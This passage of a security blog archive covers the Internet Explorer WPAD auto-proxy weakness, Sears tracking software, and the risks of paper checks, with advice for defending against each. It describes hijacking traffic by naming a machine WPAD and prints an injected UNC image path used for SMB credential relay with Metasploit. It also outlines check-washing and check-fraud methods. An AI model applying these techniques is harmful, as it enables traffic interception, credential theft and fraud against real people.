- A citizenry that trusts itself. People must believe they are competent to solve their own problems, so the first reaction to a disaster is not “how will I get help,” but rather “what do I need to do?” Government cannot save everyone; if the able-bodied and passably intelligent people save themselves, government is freed up to help those who genuinely need it, and not simply those who abrogated their responsibility to plan.
- A populace that cares for others while still expecting them to take care of themselves. When disasters like Hurricane Katrina or 9/11 occur, there is an outpouring of charity from the populace to help. It doesn’t take government to solicit this; general benevolence will do, the desire to help anyone hurt by a disaster rather than using disaster as an impetus to hoard more for yourself and your tribe. However, people also must recognize the limits of charity, and be willing to go back to their own lives as time passes.
All of these are cultural shifts; we can’t impose them, and as Giuliani is running for head of government, it makes sense for him to talk about government actions. However, the statements he’s making are precisely what damages resilience. When all we hear from government is how they are expecting impending doom, and how government will save us when it happens, it does not teach us to have hope, trust ourselves, and help others! It teaches us to always anticipate disaster, do nothing and wait for help when it happens, and expect the government to do all the helping. Regardless of what the government does, this rhetoric from our politicians itself reduces the resilience of our society.
If you run Internet Explorer, you may have noticed that often when you first load up IE and try to navigate to a web page, there’s a delay of a few seconds longer than there is on subsequent page loads. This is because IE is trying to automatically detect your proxy settings. Inside Internet Options -> Connections -> LAN Settings, you’ll find an option called “Automatically detect settings” which defaults to on. Unless you’ve turned it off manually or are joined to a corporate domain that turns it off, it’s probably still on.
It turns out that this setting is absolutely appalling for security, opening up several opportunities for an enterprising hacker on your local network. On a corporate network, that may be everyone in the building — on a wireless hotspot, it’s anyone in range. To understand the vulnerability, we have to look at how Automatically Detect Settings actually detects your settings.
When IE is first requested to load a page, it attempts to locate a server called WPAD. First, it checks the information received from the DHCP server, looking for site-local option 252, “auto-proxy-config.” Failing this, it tries to do this with a DNS lookup, asking the local DNS server to identify the IP address for WPAD. If this doesn’t work, it proceeds to try to use WINS — the old NetBIOS-based Windows Internet Name Service that is how multiple computers on a home network identify each other in the absence of a DNS server — to identify WPAD. It will try this for each domain extension up the hierarchy — if your computer is called fnord.endor.sparkplug.squid.com, it will look for, in order:
- wpad.endor.sparkplug.squid.com
- wpad.sparkplug.squid.com
- wpad.squid.com
It should not try to load from wpad.com (or wpad.net, etc.), though some configuration errors can cause it to try. In any case, if it finds a server called WPAD, it tries to retrieve proxy data from it, by issuing:
GET /wpad.dat HTTP/1.0
This is called the Web Proxy Auto Discovery Protocol, from which WPAD gets its name. The resulting file wpad.dat must be returned with the MIME type “application/x-ns-proxy-autoconfig”, and contain JavaScript that implements a function called FindProxyForURL (the name is case-sensitive). This function is then called by IE on every URL it tries to load from then on, to determine what proxy servers, if any, it should use. The simplest example of this file could be something like this:
function FindProxyForURL(url, host)
{
    // Send every request to one proxy; if it is unreachable, fall back to a direct connection.
    return "PROXY isa.squid.com:80; DIRECT";
}
This tells IE to use the same proxy for everything, and that if that fails, try a direct connection. An enterprise with multiple proxies and internal networks could use the URL and HOST parameters to do a more complex proxy configuration. This file is actually in the Netscape Proxy Client Autoconfig file format, and can contain quite a bit of interesting script.
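The following is an added example, not code from the original post, of the more complex configuration the paragraph above alludes to: a PAC file that branches on the url and host parameters. The proxy names isa.squid.com, isa2.squid.com and ftpproxy.squid.com, and the internal domain corp.squid.com, are assumptions. It uses plain JavaScript string operations instead of the browser-supplied PAC helpers (dnsDomainIs, isInNet, shExpMatch), so it runs unchanged in any JavaScript engine; the function name must be exactly FindProxyForURL.

```javascript
// Added example PAC file (not the original post's code). All hostnames and
// proxy addresses are assumptions chosen for illustration.
//
// Return value syntax: a semicolon-separated list of "PROXY host:port" and/or
// "DIRECT"; the browser tries each entry in order until one works.
function FindProxyForURL(url, host) {
  host = host.toLowerCase();
  const scheme = url.toLowerCase().split(":")[0];

  // Loopback, unqualified (single-label) names and the internal domain are
  // reached directly: sending them through a proxy leaks internal names and
  // adds a hop for no benefit.
  if (host === "localhost" || host === "127.0.0.1" ||
      host.indexOf(".") === -1 || host.endsWith(".corp.squid.com")) {
    return "DIRECT";
  }

  // Literal addresses in 10.0.0.0/8 are treated as internal as well.
  if (/^10\.\d{1,3}\.\d{1,3}\.\d{1,3}$/.test(host)) {
    return "DIRECT";
  }

  // FTP goes to a dedicated proxy; it may fall back to a direct connection.
  if (scheme === "ftp") {
    return "PROXY ftpproxy.squid.com:2121; DIRECT";
  }

  // HTTPS goes to the filtering proxies only. Deliberately no DIRECT entry:
  // if this proxy enforces policy, a DIRECT fallback would switch the policy
  // off whenever the proxy is unreachable.
  if (scheme === "https") {
    return "PROXY isa.squid.com:8080; PROXY isa2.squid.com:8080";
  }

  // Everything else: primary proxy, secondary proxy, then direct.
  return "PROXY isa.squid.com:80; PROXY isa2.squid.com:80; DIRECT";
}
```

The one design point worth noticing is the difference between the last two rules. A trailing DIRECT is convenient, but it means that whenever the listed proxies are unreachable the browser silently connects on its own, so any logging or filtering the proxy provides is bypassed. For traffic where the proxy is the control, leave DIRECT out and accept that an outage shows up as an error.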
So, in a large enterprise, this is all very convenient. As the network administrator, you can control the proxy configuration of everyone on the network from one convenient file. Should you need to change anything, you change it in one place and it gets picked up. Most enterprises don’t use this feature — I’ve heard that only about 3% do — because they instead distribute proxy settings via domain Group Policy, or they simply don’t use a proxy at all. However, the few enterprises that do are some of Microsoft’s largest customers, so this feature probably has some very influential people backing it.
So, what’s the problem with this? Why do I think of it as IE’s worst feature? Because in those 90%+ of enterprises and effectively-100% of non-enterprise networks that don’t use WPAD, you can use it to mount man-in-the-middle attacks and hijack everyone’s web traffic. If someone is using you as a proxy, you have total control over their web activity. You can read everything they do, everything that the server responds with, etc. You can redirect any web traffic transparently to your own fake sites. You can even modify the responses from real sites on-the-fly with scripts — there are proxy servers for Linux that will run everything that goes through them through some user-specified regular expressions to edit it. The classic demonstration of this was a user who set up his proxy to replace all image loads on all web pages with upside-down versions of the images or random cute cat pictures from www.kittenwar.com; you can see his proxy configuration at ex-parrot.com. You can even intercept SSL communications this way, though the user will get an error message that the URL on the certificate doesn’t match the site certificate (or, if you’re more careful about crafting the cert, simply that the certificate isn’t signed by a trusted authority.)
WPAD can enable you to take control of others’ proxy settings. How? Simple… just name your computer WPAD and join a network. Anyone who uses Internet Explorer will ask your computer for the FindProxyForURL function. All you have to do is run a web server containing a file called wpad.dat at the root, and configure the server to return that file with a MIME type of “application/x-ns-proxy-autoconfig”. That file can contain a line making your computer the proxy for all URLs, and now you get everyone’s web traffic.
Normally, just registering with DHCP with a computer name of “WPAD” is enough to get you into DNS and hijack the entire network. Failing that, even if DNS is restricted, if WPAD doesn’t exist other systems will still find you based on WINS (which is decentralized and unauthenticated, and thus cannot be restricted.) And even if WPAD does exist, this feature is still scary — an attacker can still get their system named WPAD via a host of mechanisms, like DNS cache poisoning, ARP spoofing, rogue access points, etc.
But wait, it gets worse! By carrying out this attack, the attacker has the ability to make you execute arbitrary web-safe code (i.e. anything your browser will do without prompting.) After all, they can edit any page you view and add script to it. What if they add script like this?
<img src="\\wpad\share\image.gif">
Note that that’s a UNC path (Windows file sharing), not an HTTP path. Your computer will try to download that image via SMB — and since the attacker is on your local network, SMB will be successfully routed to him. Now, if he’s got a public share called “share” hosting an image called “image.gif”, this is no big deal — IE will simply display the image. But what if his machine doesn’t have shares at all, but instead a Metasploit console running my favorite Metasploit module, SMBRELAY2? Then each time a user accesses any web page, the attacker gains access to one resource of his choice as the user who loaded the web page. Every time you browse the web, the attacker gets to take an action with your credentials — including connecting back to your computer with your privileges (probably Administrator, if you’re like most people) or to any other share or website you have access to with your Windows credentials. The attacker doesn’t actually get your password — he just probably doesn’t need it, since he can act as you anyway.
Actually, an attacker can do everything I described above using only a standard Linux box with a Metasploit installation (or a BackTrack 3 LiveCD.)
So, what can you do to protect yourself or your network from this attack? As an end-user, it’s pretty simple — go into your IE or Firefox or other browser settings and disable proxy autodetection. You probably don’t need it anyway, and it slows down your first page load. If you use a network that does require a proxy, find out what the proxy is and enter its settings manually. The only reason you wouldn’t be able to do this is if you are joined to a domain that sets this setting to On via domain Group Policy, or if you run the ISA Firewall Client with the option “Enable Web Browser Automatic Configuration” enabled (in which case you can just disable that setting, too.)
As a network administrator, it’s a bit harder. If your network does not use WPAD, you could force autodetection off with Group Policy. If you do use it, make sure you have a machine registered as WPAD at each domain level and in both DNS and WINS, and specify the machine (preferably by IP address) in DHCP option 252. If a system gets the WPAD address out of DHCP, it will make no attempt to find it in other ways, which greatly reduces the opportunity for spoofing.
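The two administrator-side checks described above (knowing which wpad.* names clients on your domain will ask for, and making sure every one of those names resolves only to the machine you registered) can be scripted. What follows is an added example, not code from the original post: it generates the candidate list for the hostname used earlier, fnord.endor.sparkplug.squid.com, and then scans resolver log lines for positive answers to those names that do not match the sanctioned address. The log line format, the addresses 10.0.0.9 and 10.0.5.200, and the choice of treating a single trailing label as the public suffix are all constructed for the example.

```javascript
// Added example (not the original post's code). Hostnames, addresses and the
// log format are constructed for illustration.

// Return the wpad.<domain> names a client on `fqdn` asks for, walking up the
// hierarchy from its own domain. `suffixLabels` is how many trailing labels
// count as the public suffix and are never queried (assumption: 1, so that
// "wpad.com" is not tried; a host under "co.uk" would need 2).
function wpadCandidates(fqdn, suffixLabels = 1) {
  const labels = fqdn.toLowerCase().replace(/\.$/, "").split(".").filter(Boolean);
  const names = [];
  // Skip the host's own label (index 0) and stop before the public suffix.
  for (let i = 1; i < labels.length - suffixLabels; i++) {
    names.push("wpad." + labels.slice(i).join("."));
  }
  return names;
}

// The WPAD names an administrator has deliberately registered, and the one
// address each should resolve to. Assumption: two levels are registered and
// point at the sanctioned proxy host 10.0.0.9; the "endor" level was missed.
const SANCTIONED_WPAD = {
  "wpad.sparkplug.squid.com": "10.0.0.9",
  "wpad.squid.com": "10.0.0.9",
};

// Constructed resolver log lines (format invented for this example):
//   <timestamp> client=<ip> query=<name> type=A answer=<ip|NXDOMAIN>
// Client 10.0.5.41 receives an answer at the unregistered "endor" level from
// a host that simply named itself WPAD; everything else is benign.
const SAMPLE_LOG = [
  "2008-01-14T09:12:01 client=10.0.5.23 query=wpad.endor.sparkplug.squid.com type=A answer=NXDOMAIN",
  "2008-01-14T09:12:01 client=10.0.5.23 query=wpad.sparkplug.squid.com type=A answer=10.0.0.9",
  "2008-01-14T09:15:44 client=10.0.5.41 query=wpad.endor.sparkplug.squid.com type=A answer=10.0.5.200",
  "2008-01-14T09:15:45 client=10.0.5.41 query=www.example.org type=A answer=192.0.2.10",
  "2008-01-14T09:20:10 client=10.0.5.7 query=wpad.squid.com type=A answer=10.0.0.9",
];

// Report every positive answer for a watched WPAD name that is not the
// sanctioned address for that name. `expected === null` in an alert means the
// answer came from a level nobody registered, which is exactly the gap the
// text says to close by registering WPAD at every domain level.
function findRogueWpadAnswers(logLines, clientFqdn, sanctioned) {
  const watched = new Set(wpadCandidates(clientFqdn));
  const re = /^(\S+) client=(\S+) query=(\S+) type=A answer=(\S+)$/;
  const alerts = [];
  for (const line of logLines) {
    const m = re.exec(line.trim());
    if (!m) continue; // not a line in the expected format
    const [, ts, client, rawName, answer] = m;
    const name = rawName.toLowerCase().replace(/\.$/, "");
    if (!watched.has(name) || answer === "NXDOMAIN") continue;
    const expected = Object.prototype.hasOwnProperty.call(sanctioned, name)
      ? sanctioned[name]
      : null;
    if (expected !== answer) {
      alerts.push({ ts, client, name, answer, expected });
    }
  }
  return alerts;
}

// Stand-alone run over the constructed sample: one rogue answer is reported.
const ROGUE_WPAD_ALERTS = findRogueWpadAnswers(
  SAMPLE_LOG, "fnord.endor.sparkplug.squid.com", SANCTIONED_WPAD);
console.log(wpadCandidates("fnord.endor.sparkplug.squid.com"));
console.log(ROGUE_WPAD_ALERTS);
```

On a network that does not use WPAD at all, pass an empty map as `sanctioned`: then any positive answer for a wpad.* name is worth investigating, since the only way one appears is a host that registered that name itself. The script covers DNS only; a name learned over WINS never reaches the resolver log, which is one more reason the text's advice to publish the address in DHCP option 252 (so clients never fall through to WINS) matters.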
The ultimate solution to this would be for Microsoft to make it off by default. Unfortunately, as an automation-simplification feature, having it off by default would pretty much defeat its purpose.
Sears & KMart’s Official Malware
CA’s Security Advisor Research Blog has an interesting post about a bit of malware they discovered when doing research for their Anti-Spyware product — the My SHC Community system. You’re offered a chance to join when you buy something from sears.com or kmart.com. The system offers you “special offers and promotions,” the usual marketing stuff — give up some privacy in exchange for discounts.
However, this system does rather more tracking than your average grocery store “membership card.” When you join, it installs a local proxy on your system and reroutes all your web traffic through it, including SSL sessions on port 443 (yes, it actually mounts local man-in-the-middle attacks on your online banking.) It then monitors this traffic, and based on some algorithm that has not been disclosed, sends some of it to comScore. Sears’s privacy policy promises not to share your data with anyone, and so does comScore’s, but it’s pretty hard to figure out what that means in this case. After all, comScore’s policy also promises not to collect any information that’s personally identifiable, but your My SHC Community data is tied to a personal ID at Sears, so in this case they’re clearly collecting personally identifiable information. Also, I think most people would consider copies of my online transactions in SSL sessions to be “personally identifiable;” while we can’t be sure comScore gets all of these (since the algorithm by which some traffic is rerouted is unknown), we do know the software is capable of sending them to comScore so we just have to take their word for it. Also, CA’s research did show an SSL transaction being rerouted, credit card numbers and all.
Bruce Schneier points out that if an average piece of spyware did this, it would be considered criminal. However, not only is Sears a large corporation and thus able to get away with this sort of thing (remember the Sony Rootkit debacle?), it also did have a pretty clear privacy statement that the user agrees to before installing it, so it may be on good legal ground. However, even if it’s legal, it’s a terrible idea for all involved.
First of all, the app is silent — once it’s been installed, it gives no indication it is monitoring your traffic, and no clear way to remove it. Second, the fact that the app comes from Sears, providing their privacy policy, but the data goes to comScore, while both parties claim the data is not shared with “any other party,” makes the privacy policies border on nonsensical. If it takes a lawyer to figure out what exactly your click-through license agreement means, it’s pretty disingenuous to claim that end users have been properly informed and have voluntarily waived their privacy rights. And third, comScore & Sears are collecting data (such as your credit card numbers and favorite non-commercial websites) that they don’t even want along with the information that they’re trying to collect. This puts on them a legal burden to protect and secure huge volumes of information that provides them no benefit.
When you have private data that you have a moral, legal, or regulatory responsibility to protect, the first thing to consider, before looking at security measures, is whether you need the data at all. It’s a lot easier to delete it and stop collecting it than it is to put in encryption systems, network access controls, auditing and logging systems, etc. A lot of companies collect reams of useless private data simply because “they’ve always done it that way,” and thus have to spend money protecting things of no value to them. This is probably the logic behind Sears’s data collection here — “we might as well have everything, it could be useful someday” without thinking about the cost that having that data imposes on the enterprise. You can’t have a catastrophic data breach if you don’t have the data.
This is also another symptom of a larger problem — people are increasingly unable to control the code running on their own computers. The separation of code and data is becoming increasingly porous with the web’s “active content,” and DRM software exists to keep the user from controlling their own system’s activity. Microsoft’s Vista User Account Control and Integrity Levels systems try to mitigate this, but it’s really not enough.
The problem is that they rely on the user to determine what code is allowed to run, but the user is unable to verify what that code will do until he runs it. It’s impossible for the computer to tell the user what it will do, as native code is unverifiable. With some technologies, such as Microsoft .NET code, it is possible for the system to tell the user what the code will do, but people writing malicious or underhanded apps like this Sears spyware and the Sony rootkit will not use these technologies, sticking to the unverifiable native code. It is my hope that virtualization will offer a way out of this in the long term — a way for each application to have its own enforceable security boundary. However, to avoid these same problems from occurring, application developers will have to give up functionality — that is, certain types of inter-application interaction will have to be categorically prohibited, which will sometimes inconvenience the user.
I think we’re more likely to see these solutions come from the open-source world than the commercial operating system world (i.e. Microsoft and Apple.) The commercial OS world is very concerned about a.) ease of use for the user, and b.) backwards compatibility for applications, as these things sell software. The open-source world is less concerned with these things, which inhibits their adoption in the marketplace but also results in software that is often much more under the user’s control than commercial software is. The real trick will not be developing these security technologies (not that that will be easy); it will be adapting them so that they can be used every day by non-technical users.
During this year’s Christmas shopping season, I made some large in-person transactions at the same time as my wife made an online transaction, and my credit card was suspended by the issuing bank for potential fraudulent activity. This happens relatively often, whenever someone’s spending patterns are flagged by the neural-network based automated fraud detection used by all the major credit card issuers. When calling the bank to have the card reactivated, I was told by the customer service representative, “since online transactions are, you know, more dangerous, we tend to notice those.”
This is not an uncommon perception. Many people who think nothing of handing over their credit card or writing a check when at a store or restaurant hesitate to use the same card online, regardless of communication protections (e.g. SSL/HTTPS), third-party assurances like the preposterously-named HackerSafe, or the size and stability of the vendor. After all, it’s the Internet, there are bad people out there.
However, the perception just isn’t true. There are two ways in which the Internet particularly helps thieves, though:
- Once they’ve stolen an identity or credit card number, thieves often use the card online, as they don’t have to present themselves (and thus show up to witnesses and potentially security cameras) to use the card. This is actually probably what the credit card company in my experience meant — not that the transactions are more dangerous, but that fraudsters often use stolen cards online.
- Hackers stealing credit card information online often steal entire databases. They don’t steal your credit card while you’re buying something online — they break into the online store and steal everybody’s card.
However, they could just as easily have broken into the servers of a brick-and-mortar store — it’s not the fact that you used the card online that makes it possible for them to steal it; it would have been just as much at risk had you handed it to a cashier.
In many ways, it’s a lot more risky to make non-cash payments in person! When you hand your credit card to a waiter or clerk or cashier, they could easily copy the number, expiration date, and CVV2 code (the three-digit code on the back that an online site often won’t even get.) With a debit card, they have the opportunity to watch PINs being typed. Whereas in an online store, only relatively few, well-paid professionals will have access to your data (system administrators, etc.), every $7 per hour sales clerk can see a hundred card numbers per day, and probably has significantly more financial motivation to steal them (although in my experience, the fact that someone doesn’t need money won’t stop them from stealing it if they’re the type to steal — just look at Michael Milken, who defrauded people out of hundreds of millions of dollars at the same time he was making hundreds of millions legitimately.)
Some people — usually those of us who remember the days before debit cards — eschew all these fancy online and electronic forms of payment and instead stick to good old fashioned checks. After all, no one can possibly steal those! They’re paper, and have your signature on them. This is the ultimate in perception differing from reality — it’s hard to imagine a less secure way to make a payment than a paper check.
First of all, there’s the ease of committing fraud with checks. A thief with a stolen check (or deposit slip) has all they need to take money from your account — the routing number and account number (found at the bottom of the check in MICR letters.) Note that the thief doesn’t need any kind of ID… or a PIN… or a physical card… or a CVV2 code… or even to know your name. No, the numbers will do. What can they do with a stolen check? There are three basic things:
- Order up a whole book of checks with your information and account numbers on them. No ID is required to order checkbooks online. They can then spend these checks anywhere, and the bank will process them — you probably won’t find out until your account is empty and you start getting NSF notices.
- Remove the amount and recipient from the check and write it out to themselves instead. This is a bigger problem for institutional checks, which are often printed on a laser printer. It’s really easy to remove laser-printed text from an offset-printed check — just lay some Scotch tape over the laser text, rub it hard with your fingernail, and peel the text off. Then you can print out a new amount and recipient with your own laser printer, and it looks just like the real thing. Chemical agents (“check washing”) can do this with ball-point pen ink, too, though it’s not so easy.
- Issue a demand draft (“paperless check.”) This is what happens when you pay by phone with your checking account number, or use an automated bill pay service, or send money via PayPal. Using your routing number and account number, money is simply removed from your account and put into someone else’s. No authorization or authentication is used; your name is not even required. Yes, really. Anyone can do this from any account to any other account. For a while, you used to be able to do this from a web site.
Second, there’s the difficulty in getting your money back or even stopping the fraud! With a credit card (and to a lesser extent, a debit card), it’s pretty simple — you call the bank, say you did not authorize a charge, and the credit card company removes the charge. It is then up to them to prove you did make the charge, such as by getting a signed receipt from the merchant and matching your signature. So long as you report the fraud within 30 days, you are not liable — the worst the card company can do to you is to cancel your card (but you still don’t have to pay for the charge you didn’t make.) In theory, you’re liable for up to $50, but almost no card issuers really charge this since it’s terrible customer service (“Sorry you were stolen from! Give us $50!”)
With checks, the money is already gone. If you report a check as fraudulent, there is no federal law saying the bank is liable — it’s up to the bank’s own policies and in some cases a hodgepodge of state laws whether they have to help you at all. The bank may get back to you in 60 to 90 days (during which you don’t have the money, even if it was the entire contents of your checking account.) You have to report the fraud on a paper letter, with a notarized signature, usually by certified mail. What’s more, you have to prove that the checks were not authorized — the burden of proof is on you, not the bank or merchant — and you have to do it to each party from which you’re trying to reclaim money. If a thief wrote bad checks in 20 different jurisdictions, you may be dealing with this for years.
Worse yet, you can’t stop the fraud from taking place. The thief can keep writing checks on your account even after you’ve started reporting them as fraud, and even after you’ve closed the account. Every time the thief writes a bad check on a closed account (the classic practice known as “paperhanging”, a favorite of Frank Abagnale during his criminal youth), your bank will reopen the account and send you an NSF notice. You have to dispute all of these, too. And finally, your account (and possibly your name) will go into ChexSystems (the equivalent of the credit bureaus used to check people’s checking account history) as fraudulent, which will make it difficult or impossible to get new checking accounts for many years. On the bright side, it will make it harder for the thief to open accounts in your name, but that’s little consolation since he can keep using the closed one he already has.
From a security perspective, checking accounts are horrid. They come from a day when authentication and authorization were unheard-of, and security came mainly from the idea that no one would figure out how to subvert the system.
What can you do to protect yourself?
- Don’t use checks. If any method of payment is offered aside from checks, use that.
- Don’t use demand drafts, either — they’re checks. Don’t pay by phone using a checking account number — use a credit/debit card.
- If you must write paper checks, use them only to pay bills, dealing with relatively trusted merchants. It doesn’t make you totally safe, of course, but it helps some. Use gel ink to write checks (it’s harder to wash), or a dot-matrix printer to print them (the impact-printed ink is nigh-impossible to remove.) According to Abagnale’s The Art of the Steal, this makes check-washing nearly impossible (though ordering up new checks in your name still works.) Incidentally, The Art of the Steal is a fantastic (and very short) book, and I highly recommend it to anyone interested in security — it gives a great view into the security mindset, looking at all parts of a system and seeing how it can be subverted.
- Don’t store any more money in your checking account than you have to. You’ll still have to fight every fraudulent transaction to stop the bank trying to collect it from you, but at least you’ll still have your money while you’re doing it.
The sooner we move on from this antiquated and unsafe payment system, the better.